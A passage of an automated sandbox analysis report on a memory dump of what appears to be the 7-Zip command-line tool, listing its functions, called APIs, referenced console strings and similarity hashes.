free.MSVCRT ref: 00B5819B
free.MSVCRT ref: 00B581A6
free.MSVCRT ref: 00B581BB
free.MSVCRT ref: 00B58243
free.MSVCRT ref: 00B5824E
free.MSVCRT ref: 00B5815F

Part of subcall function 00B5339C: free.MSVCRT ref: 00B533D7
Part of subcall function 00B5339C: memmove.MSVCRT(00000000,?,?,00000000,00B510A8), ref: 00B533F2

Strings

:$DATA, xrefs: 00B58030, 00B58040
:, xrefs: 00B57F3A
\, xrefs: 00B57F44

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$AddressDiskErrorFreeHandleLastModuleProcSpacememmove
String ID: :$:$DATA$\
API String ID: 4130059181-1004618218
Opcode ID: 7d47eded2622c94f0ddccb54c994b41fb8cf36bc1bcc716852e6415c4a0d71d6
Instruction ID: cf94793543f665fc6d44f29e933a432ed35c2e975029c20b5bb4cb87c7c5a33a
Opcode Fuzzy Hash: 7d47eded2622c94f0ddccb54c994b41fb8cf36bc1bcc716852e6415c4a0d71d6
Instruction Fuzzy Hash: 1C028E33609680D6CB20EF25E49036EB7A0F795791F4042E6EB8E97B68DF34C569CB44

Function 00B93E84 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fputs.MSVCRT ref: 00B93ED4

Part of subcall function 00B92E24: fputs.MSVCRT ref: 00B92E47
Part of subcall function 00B92E24: fputs.MSVCRT ref: 00B92E57

fputs.MSVCRT ref: 00B93F0F

Part of subcall function 00B52300: fputc.MSVCRT ref: 00B52311

free.MSVCRT ref: 00B93F4C
fputs.MSVCRT ref: 00B93FAA
fputs.MSVCRT ref: 00B93FBA
fputs.MSVCRT ref: 00B94003
fputs.MSVCRT ref: 00B94013
SysFreeString.OLEAUT32 ref: 00B940A1
fputs.MSVCRT ref: 00B940C9
SysFreeString.OLEAUT32 ref: 00B9418B
SysFreeString.OLEAUT32 ref: 00B941C2

Strings

--, xrefs: 00B93ECD
Path, xrefs: 00B93EE4
Type, xrefs: 00B93F76
----, xrefs: 00B940C2
Warning: The archive is open with offset, xrefs: 00B93F08
= , xrefs: 00B93FB3, 00B9400C

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputs$FreeString$fputcfree
String ID: = $--$----$Path$Type$Warning: The archive is open with offset
API String ID: 2701146716-1919703766
Opcode ID: 98949995720aafeada5ab4e649821211fbe2246f847a42084f07584e6b56428e
Instruction ID: 49b54220ee092c085280092ceeaf87a2ed83eb24d059ae4491913fbfee9e5ba8
Opcode Fuzzy Hash: 98949995720aafeada5ab4e649821211fbe2246f847a42084f07584e6b56428e
Instruction Fuzzy Hash: 1C915836314A8592DF10DF22E95476E77A0F795BC4F0051A2EF5A97B28DF38C94AC700

Function 00B5F71C Relevance: 30.0, APIs: 11, Strings: 6, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B51610: free.MSVCRT ref: 00B51682
Part of subcall function 00B51610: free.MSVCRT ref: 00B5168A
Part of subcall function 00B51610: free.MSVCRT ref: 00B516C4

_CxxThrowException.MSVCRT ref: 00B5F76E
_isatty.MSVCRT ref: 00B5F77E
_isatty.MSVCRT ref: 00B5F796
_isatty.MSVCRT ref: 00B5F7AE
_CxxThrowException.MSVCRT ref: 00B5F8E0
wcscmp.MSVCRT ref: 00B5F96F
_CxxThrowException.MSVCRT ref: 00B5F9AE
_CxxThrowException.MSVCRT ref: 00B5FA6F
GetCurrentProcess.KERNEL32 ref: 00B5FA77
SetProcessAffinityMask.KERNEL32 ref: 00B5FA83
free.MSVCRT ref: 00B5FA8F

Strings

Unsupported switch postfix for -slp, xrefs: 00B5F991
SeRestorePrivilege, xrefs: 00B5F91C
Unsupported switch postfix -bb, xrefs: 00B5F8C3
SeCreateSymbolicLinkPrivilege, xrefs: 00B5F92A
SeLockMemoryPrivilege, xrefs: 00B5F9CB
Unsupported switch postfix -stm, xrefs: 00B5FA52

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: ExceptionThrowfree$_isatty$Process$AffinityCurrentMaskwcscmp
String ID: SeCreateSymbolicLinkPrivilege$SeLockMemoryPrivilege$SeRestorePrivilege$Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp
API String ID: 1961088698-2328792591
Opcode ID: c2f4b7cbffa4da8aa62650c82c274732c1406b7f11731e234dbbf7887eb3a42e
Instruction ID: 9dc94220775f5a80a9ee87e3d7ba42c3cfe96d53057883bfd840e14c77fa5098
Opcode Fuzzy Hash: c2f4b7cbffa4da8aa62650c82c274732c1406b7f11731e234dbbf7887eb3a42e
Instruction Fuzzy Hash: 21A19F73608AC5DAEB11DF24D4903AC7FA0E396B94F5881F6DB8C47725CB64C989C710

Function 00B9A448 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fputs.MSVCRT ref: 00B9A477

Part of subcall function 00B526A0: fputs.MSVCRT ref: 00B526C1

fputs.MSVCRT ref: 00B9A4C1
free.MSVCRT ref: 00B9A52B
free.MSVCRT ref: 00B9A533
free.MSVCRT ref: 00B9A545
free.MSVCRT ref: 00B9A57A
free.MSVCRT ref: 00B9A582
free.MSVCRT ref: 00B9A594
_CxxThrowException.MSVCRT ref: 00B9A5E1
free.MSVCRT ref: 00B9A5EF
free.MSVCRT ref: 00B9A61C
free.MSVCRT ref: 00B9A62E

Part of subcall function 00B52300: fputc.MSVCRT ref: 00B52311

Strings

Errors: , xrefs: 00B9A4BA
Warnings: , xrefs: 00B9A470

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$fputs$ExceptionThrowfputc
String ID: Errors: $Warnings:
API String ID: 437615013-2345102087
Opcode ID: b879da1ccfc066a1247b5c29666ac93705d06d21a2897076d20723f3459c7b25
Instruction ID: 68664b364de158fc4f79293aeea0ca7bfb0b500bbdf2c342525d1ede85ea0028
Opcode Fuzzy Hash: b879da1ccfc066a1247b5c29666ac93705d06d21a2897076d20723f3459c7b25
Instruction Fuzzy Hash: F65184623569C081CD30EB25E8913AEB3E1F782791F4541E2DE9D57759DF38C88A8B41

Function 00B783C8 Relevance: 27.2, APIs: 13, Strings: 5, Instructions: 152
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B58624: free.MSVCRT ref: 00B586A9

free.MSVCRT ref: 00B78493
free.MSVCRT ref: 00B784A7
free.MSVCRT ref: 00B784B8
free.MSVCRT ref: 00B78503
free.MSVCRT ref: 00B7850E

Part of subcall function 00B586DC: free.MSVCRT ref: 00B58761

free.MSVCRT ref: 00B7854D
free.MSVCRT ref: 00B78558
free.MSVCRT ref: 00B78590
free.MSVCRT ref: 00B7859B

Part of subcall function 00B78290: free.MSVCRT ref: 00B7832B
Part of subcall function 00B78290: free.MSVCRT ref: 00B78336

free.MSVCRT ref: 00B785D0
free.MSVCRT ref: 00B785DB
free.MSVCRT ref: 00B785EA
free.MSVCRT ref: 00B78602

Part of subcall function 00B53314: memmove.MSVCRT ref: 00B53339

Strings

Path, xrefs: 00B7856A, 00B785AA
Path64, xrefs: 00B784D6, 00B78520
7z.dll, xrefs: 00B783F0
Codecs, xrefs: 00B7841F
Formats, xrefs: 00B7844E

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$memmove
String ID: 7z.dll$Codecs$Formats$Path$Path64
API String ID: 1534225298-3804457719
Opcode ID: 83274c2b3d544992283108eb9c5b7aa940d95cecb85798d2266b0b7fa0fa9ebc
Instruction ID: 53c628bb2d1d986c5890e710c5172ef5cd88eabdfe06ef8416e93cf77ca90e0a
Opcode Fuzzy Hash: 83274c2b3d544992283108eb9c5b7aa940d95cecb85798d2266b0b7fa0fa9ebc
Instruction Fuzzy Hash: 4251C82234690550CE20EF25E45535E67A0E7C2BE5F4451D2BE6E57779CF28C68ECB04

Function 00B7AB74 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 268
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.MSVCRT ref: 00B7ABC9
free.MSVCRT ref: 00B7ACF3
free.MSVCRT ref: 00B7ACFE
free.MSVCRT ref: 00B7AD95
memmove.MSVCRT(?), ref: 00B7ADCB
free.MSVCRT ref: 00B7AE70
free.MSVCRT ref: 00B7AF7F

Part of subcall function 00B794A8: free.MSVCRT ref: 00B794DB
Part of subcall function 00B794A8: free.MSVCRT ref: 00B794E3
Part of subcall function 00B794A8: free.MSVCRT ref: 00B794F0
Part of subcall function 00B794A8: free.MSVCRT ref: 00B7951C
Part of subcall function 00B794A8: free.MSVCRT ref: 00B79525
Part of subcall function 00B794A8: free.MSVCRT ref: 00B7952D
Part of subcall function 00B794A8: free.MSVCRT ref: 00B7953A

free.MSVCRT ref: 00B7AEC2

Part of subcall function 00B5339C: free.MSVCRT ref: 00B533D7
Part of subcall function 00B5339C: memmove.MSVCRT(00000000,?,?,00000000,00B510A8), ref: 00B533F2

Part of subcall function 00B7A9FC: free.MSVCRT ref: 00B7AA95
Part of subcall function 00B7A9FC: free.MSVCRT ref: 00B7AAC5
Part of subcall function 00B7A9FC: free.MSVCRT ref: 00B7AAD2

free.MSVCRT ref: 00B7AEFA
GetProcAddress.KERNEL32 ref: 00B7AF4D

Strings

Codecs\, xrefs: 00B7AE99
SetCodecs, xrefs: 00B7AF43
7z.dll, xrefs: 00B7AE3C, 00B7AE89
Formats\, xrefs: 00B7AED1

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$memmove$AddressProc
String ID: 7z.dll$Codecs\$Formats\$SetCodecs
API String ID: 4053071709-2499791885
Opcode ID: 8408131b45c12e29ab25c2e406772a01b5634e2fefe50597f9c143b7cfa8c1f7
Instruction ID: 1941e47cc1f6c83a284f0b96bd247456dd0c804047794da332595b491eb0c4f3
Opcode Fuzzy Hash: 8408131b45c12e29ab25c2e406772a01b5634e2fefe50597f9c143b7cfa8c1f7
Instruction Fuzzy Hash: 8DB1C066205AC092CB70EB21E4903AFB7E0F3C1788F508192EB9E47B25DF78C959D702

Function 00B91850 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 00B91877
fputs.MSVCRT ref: 00B9190A
LeaveCriticalSection.KERNEL32 ref: 00B91A44

Part of subcall function 00B9B1C8: memset.MSVCRT ref: 00B9B20D
Part of subcall function 00B9B1C8: fputs.MSVCRT ref: 00B9B232

fputs.MSVCRT ref: 00B9194D

Part of subcall function 00B526A0: fputs.MSVCRT ref: 00B526C1

fputs.MSVCRT ref: 00B919CB
fputs.MSVCRT ref: 00B919EA
LeaveCriticalSection.KERNEL32 ref: 00B91A51

Part of subcall function 00B52300: fputc.MSVCRT ref: 00B52311

free.MSVCRT ref: 00B91A14

Strings

Can't allocate required memory!, xrefs: 00B919E3
ERROR: , xrefs: 00B919C4
p, xrefs: 00B919A4
Sub items Errors: , xrefs: 00B91946
Everything is Ok, xrefs: 00B91903

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputs$CriticalSection$Leave$Enterfputcfreememset
String ID: Can't allocate required memory!$ERROR: $Everything is Ok$Sub items Errors: $p
API String ID: 676172275-580504279
Opcode ID: bc88cfa74a48e71b2a3b1c96f7bb5f7f406cfe66436ff89ac4e6136bfa2ff71f
Instruction ID: 99e398791b5d8b3d1fdd0a4f34587023cbfacae34bac250d750e29d3fbebf575
Opcode Fuzzy Hash: bc88cfa74a48e71b2a3b1c96f7bb5f7f406cfe66436ff89ac4e6136bfa2ff71f
Instruction Fuzzy Hash: 1D518E22305A82A6DF1DDF29D9A03AD73A0F785B90F4445B2DF2E47251DF38D8A9E304

Function 00B738E8 Relevance: 22.8, APIs: 13, Strings: 2, Instructions: 262
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B7373C: free.MSVCRT ref: 00B737FB

memmove.MSVCRT ref: 00B7396F
free.MSVCRT ref: 00B73986
free.MSVCRT ref: 00B73A11
_CxxThrowException.MSVCRT ref: 00B73A5F
free.MSVCRT ref: 00B73AD3

Part of subcall function 00B73864: free.MSVCRT ref: 00B73877
Part of subcall function 00B73864: free.MSVCRT ref: 00B73892
Part of subcall function 00B73864: free.MSVCRT ref: 00B7389B
Part of subcall function 00B73864: free.MSVCRT ref: 00B738C6
Part of subcall function 00B73864: free.MSVCRT ref: 00B738CE

Strings

Cannot find archive, xrefs: 00B73A42
Duplicate archive path:, xrefs: 00B73C07

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$ExceptionThrowmemmove
String ID: Cannot find archive$Duplicate archive path:
API String ID: 3934437811-2067063536
Opcode ID: cb8f74f9773297cdd49a0ca175e0294e4bed06a47462a3eb8b06c6dd458c7679
Instruction ID: 9bfb21faa52b19e1bca5216405c7852b4783fad8754b47fdde5ecf60cbb9509c
Opcode Fuzzy Hash: cb8f74f9773297cdd49a0ca175e0294e4bed06a47462a3eb8b06c6dd458c7679
Instruction Fuzzy Hash: 62A17273315B8492CA20EB25E49165EB3E1F785F80F409592EF9E17B29DF38C946DB00

Function 00B842A2 Relevance: 21.3, APIs: 13, Strings: 1, Instructions: 316
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memmove.MSVCRT ref: 00B84324
free.MSVCRT ref: 00B8441A
free.MSVCRT ref: 00B84425

Strings

, xrefs: 00B84466

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$memmove
String ID:
API String ID: 1534225298-3916222277
Opcode ID: bfda89d0d9cdfe3f540f1be295f01f6c1ea07059f837bb15d646c794703c55e5
Instruction ID: 3a91ea3a2d467df25c42952ff45a228df118aadbd425058d958e3c3c34935312
Opcode Fuzzy Hash: bfda89d0d9cdfe3f540f1be295f01f6c1ea07059f837bb15d646c794703c55e5
Instruction Fuzzy Hash: 01D14E37209AC596CB21EF25E09029EBBA0F7D6B84F445096DB8E47B29DF7CC548CB00

Function 00B791E0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 103libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00B79205
GetProcAddress.KERNEL32 ref: 00B79219
GetProcAddress.KERNEL32 ref: 00B7922D
GetProcAddress.KERNEL32 ref: 00B79257
memmove.MSVCRT ref: 00B792F0
GetProcAddress.KERNEL32 ref: 00B7931C

Strings

CreateDecoder, xrefs: 00B791FB
CreateEncoder, xrefs: 00B7920E
GetNumberOfMethods, xrefs: 00B79245
GetMethodProperty, xrefs: 00B79222
GetHashers, xrefs: 00B79315

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: AddressProc$memmove
String ID: CreateDecoder$CreateEncoder$GetHashers$GetMethodProperty$GetNumberOfMethods
API String ID: 2879976980-73314117
Opcode ID: 86a18b28d52ae06bcd17bab5c6f39fa0c0b3e485010e9e2949c622b07ec98686
Instruction ID: 839ebef02ada5f0eb7d571777fcdac50f9bfad5c349f3172e291236e0ddd0e5c
Opcode Fuzzy Hash: 86a18b28d52ae06bcd17bab5c6f39fa0c0b3e485010e9e2949c622b07ec98686
Instruction Fuzzy Hash: 4D414876315A4296DB20DF25F8807ADB3B1F784794F408526EB9E87B64DF78C949CB00

Function 00B91BC0 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 250COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00B91CF9

Part of subcall function 00B9B1C8: memset.MSVCRT ref: 00B9B20D
Part of subcall function 00B9B1C8: fputs.MSVCRT ref: 00B9B232

Part of subcall function 00B52300: fputc.MSVCRT ref: 00B52311

fputs.MSVCRT ref: 00B91DEE
fputs.MSVCRT ref: 00B91F07
fputs.MSVCRT ref: 00B91F5C

Part of subcall function 00B9171C: fputs.MSVCRT ref: 00B91744
Part of subcall function 00B9171C: fputs.MSVCRT ref: 00B91758
Part of subcall function 00B9171C: free.MSVCRT ref: 00B9176B

Part of subcall function 00B56618: FormatMessageW.KERNEL32 ref: 00B56676
Part of subcall function 00B56618: LocalFree.KERNEL32 ref: 00B56698

Part of subcall function 00B52320: free.MSVCRT ref: 00B5237E
Part of subcall function 00B52320: fputs.MSVCRT ref: 00B523B8
Part of subcall function 00B52320: free.MSVCRT ref: 00B523C4

free.MSVCRT ref: 00B91F86

Strings

ERROR: , xrefs: 00B91F00
Can't allocate required memory, xrefs: 00B91F55
WARNINGS:, xrefs: 00B91DB4, 00B91DE7
ERRORS:, xrefs: 00B91CBF, 00B91CF2

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputs$free$FormatFreeLocalMessagefputcmemset
String ID: Can't allocate required memory$ERROR: $ERRORS:$WARNINGS:
API String ID: 2553544393-24972044
Opcode ID: c8fab687c64268b82cb3662449b661246a7da8ff8f53bbd6509775a5cb297495
Instruction ID: 7d1dd2a2d46da232a4ff8ce54642b8788a342cae49e3dac371975a7043040700
Opcode Fuzzy Hash: c8fab687c64268b82cb3662449b661246a7da8ff8f53bbd6509775a5cb297495
Instruction Fuzzy Hash: FDA1BF76305AC6AACE29EF36D5903AE73A0F745B80F4844B6DF5E07611DF68D8A8D310

Function 00B9949B Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00B994EE
_CxxThrowException.MSVCRT ref: 00B9A5E1
free.MSVCRT ref: 00B9A5EF
free.MSVCRT ref: 00B9A61C
free.MSVCRT ref: 00B9A62E
free.MSVCRT ref: 00B9A696
free.MSVCRT ref: 00B9A69E
free.MSVCRT ref: 00B9A6B0

Strings

Decoding ERROR, xrefs: 00B994E7

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$ExceptionThrowfputs
String ID: Decoding ERROR
API String ID: 117389134-2585761706
Opcode ID: 3411419880789d43690792f4aa03f2aa0ef935c776cadf4be504cd4851e6c4ab
Instruction ID: a487bc2c7b1094883adf160b4f7f1d866d18420894e8d14a94d4033d8c8e6d94
Opcode Fuzzy Hash: 3411419880789d43690792f4aa03f2aa0ef935c776cadf4be504cd4851e6c4ab
Instruction Fuzzy Hash: 6331CE623569C081CE30EB25E8803AEB3E1F792790F4545A2CA9E57768DF78C885CB81

Function 00B7A7FC Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 123libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00B56464: FreeLibrary.KERNELBASE(?,?,?,00B564E7), ref: 00B56475

Part of subcall function 00B53404: free.MSVCRT ref: 00B53431
Part of subcall function 00B53404: memmove.MSVCRT ref: 00B5344C

GetProcAddress.KERNEL32 ref: 00B7A8CA
GetProcAddress.KERNEL32 ref: 00B7A8E8
GetProcAddress.KERNEL32 ref: 00B7A908
free.MSVCRT ref: 00B7A985
free.MSVCRT ref: 00B7A996

Strings

CreateObject, xrefs: 00B7A8FD
SetCaseSensitive, xrefs: 00B7A8DD
SetLargePageMode, xrefs: 00B7A8BF

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: AddressProcfree$FreeLibrarymemmove
String ID: CreateObject$SetCaseSensitive$SetLargePageMode
API String ID: 852969883-606380122
Opcode ID: 710e18dece972f2a263eb770059622d89b70c4050ec211417c46d53ec9b2e5f3
Instruction ID: 7e09a5f68b871edd0aaabd27123abe5218dd946858f97820f9032dec2db22bd5
Opcode Fuzzy Hash: 710e18dece972f2a263eb770059622d89b70c4050ec211417c46d53ec9b2e5f3
Instruction Fuzzy Hash: 6341A226301B4086DB61DF25E89076E73A0FB85B94F48C5A09FAE47765EF38D946C701

Function 00B9B480 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 229stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00B9B723
fputs.MSVCRT ref: 00B9B743

Part of subcall function 00B538C8: memmove.MSVCRT(00B5A0E5), ref: 00B53907

Part of subcall function 00B53A64: memmove.MSVCRT ref: 00B53AAA

GetTickCount.KERNEL32 ref: 00B9B49E

Part of subcall function 00B53404: free.MSVCRT ref: 00B53431
Part of subcall function 00B53404: memmove.MSVCRT ref: 00B5344C

strcmp.MSVCRT ref: 00B9B4E3
wcscmp.MSVCRT ref: 00B9B502
strcmp.MSVCRT ref: 00B9B568

Strings

. , xrefs: 00B9B6AC

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: memmovestrcmp$CountTickfputsfreewcscmp
String ID: .
API String ID: 591578422-4150638102
Opcode ID: 5acd8cd52b168fe2fc51d3cd0102c06d8f0252148c2191c97aee85e0001a7e08
Instruction ID: 0190136d57e3ee6f80f821adbd71ea9ae65f1d8dbdf8292174020ff0ec596aad
Opcode Fuzzy Hash: 5acd8cd52b168fe2fc51d3cd0102c06d8f0252148c2191c97aee85e0001a7e08
Instruction Fuzzy Hash: 4BA15A77700684E7CB19DF2AE69065D73A1F395B80F8081A6DB5A47B11DF38E8BAC700

Function 00B79D98 Relevance: 12.1, APIs: 8, Instructions: 134COMMON

Download Yara Rule

APIs

